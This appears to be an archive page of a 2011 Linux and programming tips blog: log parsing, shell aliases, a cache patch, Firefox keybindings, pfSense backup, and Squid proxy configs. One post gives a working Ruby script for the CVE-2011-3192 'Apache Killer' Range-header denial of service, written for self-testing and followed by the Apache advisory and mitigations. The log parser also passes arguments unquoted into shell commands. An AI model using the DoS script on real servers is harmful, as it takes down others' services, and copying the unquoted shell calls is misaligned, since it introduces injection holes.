Linux and Programming Tips, Tricks, Hacks, Guides, and How-Tos » Linux

Parsing Apache logs with Ruby and Awk

sean — Fri, 11 Nov 2011 18:19:05 +0000

I needed to find out where hits requesting a certain term were coming from, so I hacked this together in about 5 minutes and it did what I needed. The whole thing could be re-written using awk, but this is somewhat readable.

#!/usr/bin/env ruby
ips = Array.new

abort("Usage: ruby #{$0} [num-lines-to-read] [num-results] [search-term] [file]") unless ARGV[3]
ips = `tail -#{ARGV[0]} #{ARGV.last}| grep #{ARGV[2]} | awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' | sort -rn | head -#{ARGV[1]}`

ips.each do |ip|
  whois = `whois #{ip.split[1]} |grep -i country`
  puts "#{ip.split[0]} hits for IP: #{ip.split[1]} -> #{whois.split[1]}"
end

ls when you cd

sean — Wed, 09 Nov 2011 23:06:48 +0000

Almost everyone I know types this without thinking anyway, so save your fingers and put this in your .bashrc:

cdd ()  {
    builtin cd "$*" && ls -lah
}
alias cd='cdd'

Unix socket support in W3 Total Cache

sean — Fri, 04 Nov 2011 21:20:02 +0000

We needed to use W3 Total Cache at my company, but we needed it to work with Unix sockets for tighter permissions (while there are ways to get port-per-user restrictions in place, they are varying amounts of hackishness, all the way down to kernel patches). The simple patch is after the break.

Generated using:

diff -ur w3-total-cache.orig/lib/W3/Cache/Memcached.php w3-total-cache/lib/W3/Cache/Memcached.php

--- w3-total-cache.orig/lib/W3/Cache/Memcached.php	2011-08-26 01:52:28.000000000 -0400
+++ w3-total-cache/lib/W3/Cache/Memcached.php	2011-11-04 16:47:06.356716709 -0400
@@ -33,7 +33,13 @@

             foreach ((array) $config['servers'] as $server) {
                 list($ip, $port) = explode(':', $server);
-                $this->_memcache->addServer(trim($ip), (integer) trim($port), $persistant);
+                $ip = trim($ip);
+                $port = (integer) trim($port);
+                if( @filetype($ip) === 'socket' ) {
+                    $port = 0;
+                    $ip = 'unix://' . $ip;
+                }
+                $this->_memcache->addServer($ip, $port, $persistant);
             }
         } else {
             return false;

CVE-2011-3192 (“Apache Killer”) Exploit in Ruby

sean — Fri, 02 Sep 2011 19:04:29 +0000

Since I manage a metric *explitive*-ton of servers, the ApacheKiller vuln needed to get patched. A good mod_security rule or two can drop requests formed to exploit it (info after the break), but I wanted to make sure that modsec was actually catching these, so I wrote a little Ruby to help me out. I had to bust out Wireshark to analyse the HTTP HEAD request that the Perl proof-of-concept code was using, but it didn’t take long to figure out. I am fine with posting this here since the potential for abuse is low unless someone knows how to implement threading in Ruby, in which case this would be trivial to replicate anyway (plus the perl code already works fine for skript kiddies).

Notes:
- You need to pass in a valid URI, like http://localhost/ or whatever
- I fixed the number of ranges in the HTTP request because 1300 was too big for one request, and it’d just cause “bad request” errors.
- I fixed the lack of a “bytes=” prefix for all the ranges
- I added request-range in addition to just “range” to make it compatible with a wider range of httpds

Happy testing!

#!/usr/bin/env ruby

require 'net/http'
require 'uri'

# ensure that we're getting a first argument and that it's a valid URI
abort("You must specify a hostname as the first argument.") if ARGV.first.nil?
abort("Invalid URI") unless uri = URI.parse(ARGV.first)

# create our request object
req = Net::HTTP::Head.new(uri.request_uri)
http = Net::HTTP.new(uri.host, uri.port)

# set custom headers
# you might need to fiddle with these to get around your default modsec filters
req.delete("Accept")
req.delete("User-Agent")
#req.add_field("Pragma", "no-cache")
#req.add_field("connection", "close")
req.add_field("Host", uri.host)

# optional, add a valid User-Agent by uncommenting the line below.
# req.add_field('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2')

# add the custom range headers to our request object
# we're adding 1300 different ranges with offsets between 1 and 1300 just like the perl PoC

# need to start by saying "range: bytes="... before we add the rest. Same for request-range
req.add_field("range", "bytes=5-0")
req.add_field("request-range", "bytes=5-0")

500.times do
    req.add_field("range", "5-#{Random.rand(0..1300)}")
    req.add_field("request-range", "5-#{Random.rand(0..1300)}")
end

# get the response by making the request
# TODO: make this block easier to understand
res = http.request(req)

# print out our request and response
puts "Request: #{res.inspect}"
req.each do |key,value|
    puts "#{key}: #{value}"
end
puts "\n"
puts "Response: #{res.inspect}"
res.each do |key,value|
    puts "#{key}: #{value}"
end

  Apache HTTPD Security ADVISORY
          ==============================
                    UPDATE 2

Title:       Range header DoS vulnerability Apache HTTPD 1.3/2.x

CVE:         CVE-2011-3192
Last Change: 20110824 1800Z
Date:        20110824 1600Z
Product:     Apache HTTPD Web Server
Versions:    Apache 1.3 all versions, Apache 2 all versions

Description:
============

A denial of service vulnerability has been found in the way the multiple
overlapping ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tools has
been observed.

The attack can be done remotely and with a modest number of requests can
cause very significant memory and CPU usage on the server.

The default Apache HTTPD installation is vulnerable.

There is currently no patch/new version of Apache HTTPD which fixes this
vulnerability. This advisory will be updated when a long term fix
is available.

A full fix is expected in the next 48 hours.

Background and the 2007 report
==============================

There are two aspects to this vulnerability. One is new, is Apache specific; and
resolved with this server side fix. The other issue is fundamentally a protocol
design issue dating back to 2007 (http://seclists.org/bugtraq/2007/Jan/83). The
contemporary interpretation of the HTTP protocol (currently) requires a server to
return multiple (overlapping) ranges; in the order requested. This means that one
can request a very large range (e.g. from byte 0- to the end) 100's of times
in a single request. Being able to do so is an issue for (propably all) webservers
and currently subject of an IETF discussion to change the protocol:

http://trac.tools.ietf.org/wg/httpbis/trac/ticket/311

Now this advisory is about how Apache its so called internal 'bucket brigades'
deal with serving such "valid" request which internally explode into 100's of
large fetches; and keeping those in memory in an inefficient way.

Mitigation:
============

There are several immediate options to mitigate this issue until a full fix
is available:

1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
   either ignore the Range: header or reject the request.

   Option 1: (Apache 2.0.61+ and 2.2)

          # Drop the Range header when more than 5 ranges.
          # CVE-2011-3192
          SetEnvIf Range (,.*?){5,} bad-range=1
          RequestHeader unset Range env=bad-range

          # optional logging.
          CustomLog logs/range-CVE-2011-3192.log common env=bad-range

   Option 2: (Old 2.0 and 1.3)

          # Reject request when more than 5 ranges in the Range: header.
          # CVE-2011-3192
          #
          RewriteEngine on
          RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
          RewriteRule .* - [F]

   The number 5 is arbitrary. Several 10's should not be an issue and may be
   required for sites which for example serve PDFs to very high end eReaders
   or use things such complex http based video streaming.

2) Limit the size of the request field to a few hundred bytes. Note that while
   this keeps the offending Range header short - it may break other headers;
   such as sizeable cookies or security fields.

          LimitRequestFieldSize 200

   Note that as the attack evolves in the field you are likely to have
   to further limit this and/or impose other LimitRequestFields limits.

   See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize

3) Use mod_headers to completely dis-allow the use of Range headers:

          RequestHeader unset Range

   Note that this may break certain clients - such as those used for
   e-Readers and progressive/http-streaming video.

4) Deploy a Range header count module as a temporary stopgap measure:

http://people.apache.org/~dirkx/mod_rangecnt.c

   Precompiled binaries for some platforms are available at:

http://people.apache.org/~dirkx/BINARIES.txt

5) Apply any of the current patches under discussion - such as:

http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g@mail.gmail.com%3e

OS and Vendor specific information
==================================

Red Hat:    Option 1 cannot be used on Red Hat Enterprise Linux 4.

https://bugzilla.redhat.com/show_bug.cgi?id=732928

NetWare:   Pre compiled binaries available.

mod_security:   Has updated their rule set; see

http://blog.spiderlabs.com/2011/08/mitigation-of-apache-range-header-dos-attack.html

Actions:
========

Apache HTTPD users who are concerned about a DoS attack against their server
should consider implementing any of the above mitigations immediately.

When using a third party attack tool to verify vulnerability - know that most
of the versions in the wild currently check for the presence of mod_deflate;
and will (mis)report that your server is not vulnerable if this module is not
present. This vulnerability is not dependent on presence or absence of
that module.

Planning:
=========

This advisory will be updated when new information, a patch or a new release
is available. A patch or new apache release for Apache 2.0 and 2.2 is expected
in the next 48 hours. Note that, while popular, Apache 1.3 is deprecated.

Customize Firefox Keyboard Shortcuts

sean — Wed, 31 Aug 2011 03:17:27 +0000

I’m a really big fan of CLI software, but sometimes you just need a GUI app, like a web browser (lynx would be so awesome if someone made a real-time image-to-ASCII-art converter plugin…I’ll work on that some day). I spend a lot of time in my gnome terminal (I use the awesome GNOME Shell) and the only keybinds I really need are:

Alt+Q – Previous Tab
Alt+W – Next Tab
Alt+Shift+Q – Move Tab Left
Alt+Shift+W – Move Tab Right

Using these, I feel every bit as efficient as when I used to use tiling WMs (I used to really like Awesome and wmii). However, Firefox lacks these shortcuts or the ability to customize them, and my fingers eventually got sick of the keyboard yoga required to tab around in Firefox (Ctrl+Tab / Ctrl+Shift+Tab by default). I knew there must be a better way, and I was right. The best part is that I didn’t even have to re-compile FF, which would have been ridiculous, but I’ve been known to do worse things in the name of making software work exactly like I need it to (one of the greatest parts of FOSS, IMO).

To pull off this hack, we’re going to grab the newest version of the KeyConfig Firefox extension. The version on the official Firefox add-ons site is a bit out of date and doesn’t work with FF6 properly. You might need to install Nightly Tester Tools and do the “override add-on compatibility” dance if you find that Firefox won’t let you install it.

Once you have that all set and have restarted Firefox, hit Ctrl+Shift+F12 to open up KeyConfig. We’re going to add two keys:

name: Previous Tab, id: xxx_key1_Previous Tab, shortcut: Alt+Q, code:
```
gBrowser.mTabContainer.advanceSelectedTab(-1, true);
```
name: Previous Tab, id: xxx_key1_Next Tab, shortcut: Alt+W, code:
```
gBrowser.mTabContainer.advanceSelectedTab(1, true);
```

Then just apply and let dry. Try holding Alt and using “Q” or “W” to cycle through your tabs now! Amazing!

If you want to mess with some different keys, you’ll probably want to dig through the latest browser2xul document and figure out what the actual code you need to pass to Firefox would be. Here is the one that I struck gold with. YMMV, and happy hacking!

Download pfSense XML configuration with a cURL one-liner

sean — Thu, 25 Aug 2011 23:45:58 +0000

I really love pfSense (freebsd-based firewall distribution) for home and office routers. It takes whatever dusty old x86 box you have (pentium 3 or newer usually works fine [bonus points if you're using a nice Intel server NIC]) and turns it into a great router / gateway box.

We use pfSense at work, and I use it at home, as well as at my parents’ house. I run mine on a HP thin client with a PCI-E slot holding a nice two-port Intel Pro 1000MT card, and my dad gets an older thin client with just a PCI secondary NIC (which works great). These thin clients are available on eBay for usually less than $50. The HP I’m running was really a steal and I could upgrade it from a mobile chip to a real AMD Athlon if I wanted, but it’s fast enough as it is. (also, @sullrich , the lead developer for pfSense, is a great guy.)

Anyway, the hack I wanted to share today concerns automated backup lovers. I was originally planning on using the rubygem Watir to do this, but that’s totally overkill to just press a button on a page and save a file.
Without further ado, here is how to download the configuration from your pfsense box, assuming your pfsense box is at 10.0.0.1:

curl -d “Submit=Download%20configuration” –insecure https://admin:YOUR_ADMIN_PASS_HERE_SMART_GUY@10.0.0.1/diag_backup.php > “my_awesome_pfSense_config_and_the_$(date)_probably.xml”

clispell, the CLI spell checker and dictionary you’ve always wanted

sean — Tue, 02 Aug 2011 02:37:16 +0000

It’s always annoying to Google a word just to see how to spell it, and Google recently stopped showing you the correction in bold/italics at the top of search results (Update: Google restored this as of 7/30/11). I also wanted to have a way to quickly ensure that I’m using a word properly, so I made clispell since I’m always hacking on something in a terminal anyway.

Usage:

$> clispell someword

clispell uses GNU ASpell and the great Oxford Advanced Learner’s Dictionary, which conveniently provides definitions and usage examples for tons of words, and even all the slang words that I could think of (!).

Installation:

$> gem install clispell

Rubygems page:

Making Squid 3 undetectable

sean — Sat, 30 Jul 2011 19:24:43 +0000

This is a pretty simple one and goes along with my last few posts about Squid. Sites like whatismyip.com will let you know if they detect a proxy, and other services might act strange if you’re behind a proxy — particularly music / movie streaming stuff. Since we’re not doing anything malicious here, we can just make Squid undetectable so those sites will just work “as they should”.

Throw this into your Squid config and restart squid to apply the changes (note that there are two blocks here depending on what version of squid you’re using — comment/uncomment accordingly):

# privacy stuff so squid is undetectable
via off
httpd_suppress_version_string    on
forwarded_for delete

# --- Squid 3.x section ---
request_header_access Via deny all
request_header_access X-Forwarded-For deny all
## you just need the 'request_header_access' stuff for localhost squid setups,
## but the below might also come in handy for running a proxy on your local net
# reply_header_access Via deny all
# reply_header_access X-Forwarded-For deny all
# --- end Squid 3.x section ---

# --- Squid 2.x section ---
# header_access Via deny all
# header_access X-Forwarded-For deny all
# --- end Squid 3.x section ---

Squid – Search Google upon DNS lookup failure

sean — Sat, 30 Jul 2011 04:17:04 +0000

Normally, when you type something in the Firefox location bar that doesn’t resolve to a site, it’ll throw you to the Google search page for whatever you typed. This is amazingly useful and surprisingly lacking in Squid. I hacked the error page and made it work like so:

Figure out where your langpack stuff is. Mine is at ‘/usr/share/squid-langpack/en’ (Ubuntu 11.04 / Squid3). Use locate or something, like this: ‘updatedb && locate -i squid |grep -i lang’
Open up your squid.conf (for me, this is at /etc/squid3/squid.conf) and make a new directive:
```
error_directory /usr/share/squid-langpack/en
```
Go into the langpack directory and rename the file ‘ERR_DNS_FAIL’ to something else, like ‘ERR_DNS_FAIL.orig’

Make a new ‘ERR_DNS_FAIL’ file in the langpack directory. Put the following code in it:

Save the file, restart squid, and type in some nonexistant thing in your location bar, like ‘oahdioajdjiowjdwoijaijwiodowaiadsd’. When you hit [Enter] or click ‘Go’, it should redirect to the Google search page for whatever you typed. This magic comes from the ‘%H’ variable passed into the squid error page. In whatever templating language this is using, ‘%H’ means “Host”.
Have phun!

Speed your web browsing WAY up with Squid3

sean — Thu, 28 Jul 2011 03:41:33 +0000

I haven’t tried this in a long time, but I used to run Squid3 at home on my pfSense router box (older Pentium 4 — worked great) and I just had the idea to use it on my laptop to speed up web browsing. It makes a HUGE difference and now pages look like they’re using AJAX for requests since the images and headers and stuff just stay put when moving between pages. RAM cache is monumentally faster than disk cache, and we’re just totally disabling disk caching / log files with this squid3 config.

To set this up, you’ll need to install squid3, set your web browser to use 127.0.0.1 (sometimes the POSIX standard of just ’0′ isn’t supported because some developers make crappy software that isn’t really POSIX) port 3128 as a proxy for HTTP (you could cache HTTPS too but IMO it’s not worth it for just general browsing), paste the stuff below at the bottom of your squid3 config file (/etc/squid3/squid.conf on Ubuntu 11.04 for me) and restart squid3 (/etc/init.d/squid3 restart).

I left most of the stuff default, but I disabled the log files and set the RAM cache down to 128 MB. You can adjust as necessary.

Update: Put some comments in to help with getting this working in Squid v2.x, disk cache, and making it work on your local network

## root@helios:/etc/squid3# egrep -v '^#' squid.conf |tr -s '\n'

## uncomment next line if using squid 2
#acl all src 0.0.0.0/0.0.0.0

## example of how to let your whole local 192.168.1.0/24 network use the cache
#acl localnet src 192.168.1.0/24
#http_access allow manager localnet
#http_access allow localnet

acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32
acl SSL_ports port 443
acl Safe_ports port 80		# http
acl Safe_ports port 21		# ftp
acl Safe_ports port 443		# https
acl Safe_ports port 70		# gopher
acl Safe_ports port 210		# wais
acl Safe_ports port 1025-65535	# unregistered ports
acl Safe_ports port 280		# http-mgmt
acl Safe_ports port 488		# gss-http
acl Safe_ports port 591		# filemaker
acl Safe_ports port 777		# multiling http
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localhost
http_access deny all
http_port 3128
hierarchy_stoplist cgi-bin ?
cache_mem 128 MB
maximum_object_size_in_memory 512 KB
memory_replacement_policy heap LFUDA
coredump_dir /var/spool/squid3
refresh_pattern ^ftp:		1440	20%	10080
refresh_pattern ^gopher:	1440	0%	1440
refresh_pattern -i (/cgi-bin/|\?) 0	0%	0
refresh_pattern .		0	20%	4320

## disk cache stuff if you want
#cache_replacement_policy heap LFUDA
#cache_dir aufs /var/spool/squid 4096 16 256
#minimum_object_size 0 KB
#maximum_object_size 4096 KB
#cache_swap_low 90
#cache_swap_high 95

## disable all logging for better performance
access_log none
cache_store_log none
cache_log /dev/null